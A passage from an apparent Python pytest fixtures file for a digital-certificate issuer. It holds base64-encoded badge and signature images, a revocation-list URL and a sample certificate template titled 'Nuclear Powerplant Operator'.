ggZm0Pwt2rxjO5Q0IZ4HPsh25KrhEkXOuBeekt0JDd4T12OT4VqtOeA0x5Gtw4XXMEC9yZBtXPrL8rHR3lQhqjsxHrpFzCkXOZgUu65QuDRg6aLNqGDazQ0I4knOSk13ZyuqzmojJguNdqKUSOb1nXqsXG0xpdPrnf07s7lw66woBsR3gngZOSWeWyle4
nSO9Kpt1GpToy4aTrXs1VvwasiN7HkCdMkFby9Wjh+YGueBp32YyUkUIFSEsLgjTw1/c0pc113Q3vNVv68FG/3KfPxWWyC9/kgkhR4QGWcVtpdBEZ47av6FL9Hw7wtTgVaoi+uaweh7MnjN+FUh/Qlg4SS2C8MrQz4XddazUVO86eRRu0t/WZINF+iC3qayjhENpdt58bGkFhRYVGiv9jkR2tonRqXM81f5EL8x+ia7WV4uI1cqe9m0mDWHrB1fIuwgDw+1wSqoNOnpjpLvxy5hgAdwAbKek3Yt/kTHmcKWya101UBigVNJcpTa2FhnNcfHB4MSRgdV0HBePf0bsDk7WsfUJ5qlvHTSTub8Y2LrCADuGd53syWxfuI6+LDDrknPnuIlS5FDdvW7EIGG9w8bMpfoR2YMCaE+hnxe713hqA0/gDaQxvoNQCT9dnSVNdhg7lG4b0eJgx45gA65R+IwbXScxHM81s8TB8e6sElOAqOsz/Gyx4FG+g8A7xwCcckF9goUjv8mc+tmxu1sRJOsJ87tuhFkBDI73q09OkOoLYZTSyko2LFRuFtQf4W4i4JvQpxEaDFXJ9SYr+U0lSjOaiZ0kAAEcHRTmsz+TbSYjMaxjI29I9PJLOL5X2gDQwEVD9luhRqtqWMp4p1xkW+bmgztYGuoZxWcLLAgc4UlMm7qTXvHB206BVvSGaoXx6o0/R3ZXiGCjXR/hRu97DiZoYbN6SY+gSUetQZ+A1ySifhDDiTrzxMlYtuwMuxR1Qjl6clrAnLQ26oQWMZ6MXPZnyu6szdqW4x1GmTeQJuTQ8GvMABaLBzje6a9wiVsuUaCW16i3V60mdrn1pPbPBpxIPFWpMiHYyvgz22biU9jDWPxhxSGzvoa0YaO8wSdZyGUjWjau8mr5K+cTlwnBm4zeOdzUVC1grk5aMDRoaySg1T5b362X10dn3cd5f77s7hB+WBHFKG+znlbikJhShZ/YKAODVxpjUmeVB2RP1ra7Tn5XotMs1mqZji+/V9Rhb/g24MyHDnUtdwOwe1KI8HOX7hbOJS2c4sLDKzo3F9qzuZ1uS2Ufx6tZhlecKg2aUq2VgAee/xQB79anjaYtfnLO4cCkKi1WT3e2asrNwPyqPKYUAH7m7F4NNidIyMUiZiO2tNNVaSOSxmZx71mnuhUG9AbYVRmP0ex5UmpUoP7rEggeDaf6SK3PLAkJePRo8EpttJvTssSXws8riIBNLMfbRqc+ctpD/VeZs4RTI5uQB4/RrJoiViSyX254mtuJkbeCW1KTpzSg0hj2QEOO59FxrRM/d3b3JlXL1gYjuCOorv6gv2I/8Qt4luPDBis49emGCjRDC5+R4ATd+umM+gIL/oLyOpVaXVhgK36a/81E+RfA7m4B7x2YoLBE54N85JiPXvDZUqEwRFc5VMLRnfqw+vwAuutCaAIggBorgaBxvH9q+XG0RLiLhA3O0LgFvEr2CvBfzDaTN5W8yHhq27gXnAKeleh+J6DhsXaxt1eRIOC6aKlomcHSQaNZpxsaofBqU2Tp1fa0KcNgTKKBa8rxM0SJtf7ZbzMZyRbwajBdUHA3z/qlHYBf/iFZoQ12Ty5oq0LvMmBmWX1a8wkG5auJkRWNx2mJDdMJLaKiR1SfIMDP2e9ukqD86+P4k1DXjDwL6LvGy7rS7gplcykD/q4aZv2BZY2NVBNmV+VmJ8qrR6EdX0cLjnn1i2F3UJRRfWhL1bl+AhAaqjqLAI64YqeZa0m7kssdx4L8YQVahgk7O8GJcpUgYHF8BYOdrciTn5n0X3DnMhLK3vlD8UVlYyBCKJSN/JLY3ZG8foAmokjhNv57XQ4BxU2h4kJnsIbQp09rlQmQ/CbjCU7cgpOlWA2nYvTA4Q9nm7VVw1icfp1KnySGJPqFsbtDwOfJETfiFSSovVtvsvKOCxYeM7k3Jh3qMtcmObYVGzOcQhBiKwedNsbuW5sZBQBNrPZmZFOPCP/C2J1NtgjyW5wO
/1rF8cgqM8BljTYNF41Ln66aMjQcrbCpG1SDzDAS/DCHcAscQg+aJZ5ISQMLBL+ShqVp9Mtk96BlE+J4j7+ieF2v0DysIMgNTgFfw2wyDqvD+FWs8hfvomlM2Op1bd+3FcerFxa4gn+qUk5tU9v75bF7RYjAEsn5QAL6q7/fZtzma9YtgPUnZPjgjU7RmzUJZWWxcbYEBqr54o/AazqpHNjz1ZDK62jgl8juCiHMO5jmvuvUcHo4bFYC+8oxa84Itqkix4fCerLcIkb2BHP6Q/TbXTzRoDrZnWZA+RCrqL7mu05WI/QLZXevAs2M7onbNTi+jYDX2NstO51ZbMYNfqugErdGlu0bqzd5lcZ31MiDjz+u2EV2Lou/oG0mI7nkLgC0+LRTSMCDrTUZssfBfPVlEkEj1bJZTaRCk7ZB6JixGQa+rAFYrV81XWHsLAbDmx1IWdlfKrtDOVTYkuPBnzXWB6saerNgcjywtwU1QIxpuc56xWGQmSq6ObO6CEBUKxo4Mh15JZGD8pbXlYzKxXXQv2B2L5Jj4VNL2yo1SiJ7EW9z+IP7DFj1Yt2Ea9KC/1K7Flk88fFtBiPmbdTL0NVM6aJxg+CF8/8HWcjrbwcDxZsAAAAldEVYdGRhdGU6Y3JlYXRlADIwMTgtMDQtMjZUMDI6MDA6MDUrMDA6MDCfmxfiAAAAJXRFWHRkYXRlOm1vZGlmeQAyMDE4LTA0LTI2VDAyOjAwOjA1KzAwOjAw7savXgAAAABJRU5ErkJggg==",
"revocation_list": "https://gist.githubusercontent.com/faustow/07a66855d713409067ff28e10778e2dd/raw/e08bb6d6f1350367d3f6d4f805ab3b1466b584d7/revocation-list-testnet.json",
"intro_url": "https://verifiable.com",
"signature_lines": [
{
"job_title": "University Issuer",
"signature_image": "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJcAAABVBAMAAAC2kWv1AAAAMFBMVEX///8AAAC/v79/f39fX1+fn5/f398/Pz8fHx/Dw8NTU1Onp6cvLy93d3cnJydvb28isqiqAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADQElEQVRYhe2WS27bMBCGp5RIudsCRbasX8iqUJ3Y3hIO7HZJSJayKAqw8StLIYnTLpNFnCv0BL1NT9MLdEhJzkNSEkfaFNAPmKQl6tNwNDMkQK1atV4nyqtjsbPqWODwCmF+hSyIKmTZvELYvEIWXFbIIgJgaUZMlobZwfAiphwHZVnz6/NuPCJRqyyMvE8G7HQpCC8HY1dJvx5Pg7AcCyy5AgihvyDrbkkUqAb0gbwjG26rkijyY9NiETSuaADOawD3Az5siEtLwoFrS5i9BnYRdwxWiqr9ZdQA0ubfOcKY2hFFJI8HCzYEDw6p24aFA4f4JSA3Zslhv5A1lEL3S3BPOkxQz1EjkDZs8JqfZxgb62+dKxYCucK+9ZOFXDiqKxzYULCnoujtU3xDgTc7uBoXf/zYXjB3yrhowWYAbwuDVc+GVcYms0hM6AYH5sL5SlpqfeLJHgwVtHpFsAPdtHVD77HWutVR8UvfpP1P3IE93lFYsjlWjgIW0YbFe4RpkmQx99CZXR/ob5Cjc0SO0BsRMF5cueNANtXTbBRJspirF+i0Hnx1KUQc+lgRW0RgSOBDKh9mls80hwpy+zlMksXowxEHYa1CCREL/jQ5tagEd2tBVkI3li6dTXk9sFtJshjRPfzOkzc3wG48OAM3pDa3tFFFJda4rIE/0lFH4KTJYjTf1y1RzMdZRxBw6iwHW4cUwbTrmzbWvVmaLGbxkzieiGchff/bANjHvypdSJ6autnorcbC1YltsuhnvHixIejaRTS5oYzFBSzQZZy6Oti9UzwrZZMFWXcOjz/jg/uPhVMw2Mc+monJwh4ki37RnSkmwCz1FKxtVjueoJXDRxOpcfj26xn04CkWTPRZkK572R2CjZIJ6f/oOcMwJAcw+6JY9s5BMmF7wU9sLRRzfWgP8qrQnJuOiLu5z+6VvmrLPE/QBGLxZwAPNJO6aGWULHK3XY1Nct1qpfydDijaXZ3s5Wk6mGTvFcuFvFWy6PHgRZK5hm0r4G7+X7JOzvxVZvAyNVXOxW0OjXaD5SqFEVEBLE2JSs79VtLvFBhFSqKl9Akx1kxjWCWGoQIOpPC0tbM6gVcZq1atWrVq1fqP9Q9Wkn4v31JdhQAAAABJRU5ErkJggg==",
"name": "Your signature"
}
],
"signature_file": 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAJcAAABVBAMAAAC2kWv1AAAAMFBMVEX///8AAAC/v79/f39fX1+fn5/f398/Pz8fHx/Dw8NTU1Onp6cvLy93d3cnJydvb28isqiqAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADQElEQVRYhe2WS27bMBCGp5RIudsCRbasX8iqUJ3Y3hIO7HZJSJayKAqw8StLIYnTLpNFnCv0BL1NT9MLdEhJzkNSEkfaFNAPmKQl6tNwNDMkQK1atV4nyqtjsbPqWODwCmF+hSyIKmTZvELYvEIWXFbIIgJgaUZMlobZwfAiphwHZVnz6/NuPCJRqyyMvE8G7HQpCC8HY1dJvx5Pg7AcCyy5AgihvyDrbkkUqAb0gbwjG26rkijyY9NiETSuaADOawD3Az5siEtLwoFrS5i9BnYRdwxWiqr9ZdQA0ubfOcKY2hFFJI8HCzYEDw6p24aFA4f4JSA3Zslhv5A1lEL3S3BPOkxQz1EjkDZs8JqfZxgb62+dKxYCucK+9ZOFXDiqKxzYULCnoujtU3xDgTc7uBoXf/zYXjB3yrhowWYAbwuDVc+GVcYms0hM6AYH5sL5SlpqfeLJHgwVtHpFsAPdtHVD77HWutVR8UvfpP1P3IE93lFYsjlWjgIW0YbFe4RpkmQx99CZXR/ob5Cjc0SO0BsRMF5cueNANtXTbBRJspirF+i0Hnx1KUQc+lgRW0RgSOBDKh9mls80hwpy+zlMksXowxEHYa1CCREL/jQ5tagEd2tBVkI3li6dTXk9sFtJshjRPfzOkzc3wG48OAM3pDa3tFFFJda4rIE/0lFH4KTJYjTf1y1RzMdZRxBw6iwHW4cUwbTrmzbWvVmaLGbxkzieiGchff/bANjHvypdSJ6autnorcbC1YltsuhnvHixIejaRTS5oYzFBSzQZZy6Oti9UzwrZZMFWXcOjz/jg/uPhVMw2Mc+monJwh4ki37RnSkmwCz1FKxtVjueoJXDRxOpcfj26xn04CkWTPRZkK572R2CjZIJ6f/oOcMwJAcw+6JY9s5BMmF7wU9sLRRzfWgP8qrQnJuOiLu5z+6VvmrLPE/QBGLxZwAPNJO6aGWULHK3XY1Nct1qpfydDijaXZ3s5Wk6mGTvFcuFvFWy6PHgRZK5hm0r4G7+X7JOzvxVZvAyNVXOxW0OjXaD5SqFEVEBLE2JSs79VtLvFBhFSqKl9Akx1kxjWCWGoQIOpPC0tbM6gVcZq1atWrVq1fqP9Q9Wkn4v31JdhQAAAABJRU5ErkJggg==',
})
@pytest.fixture
def template() -> Dict:
yield AttrDict({
"id": "123Y-UI12-3YUI",
"title": "Nuclear Powerplant Operator",
"description": "Operators know how to run the plant.",
"criteria_narrative": "Candidates are tested on...",
"image": "data:image/png;base64,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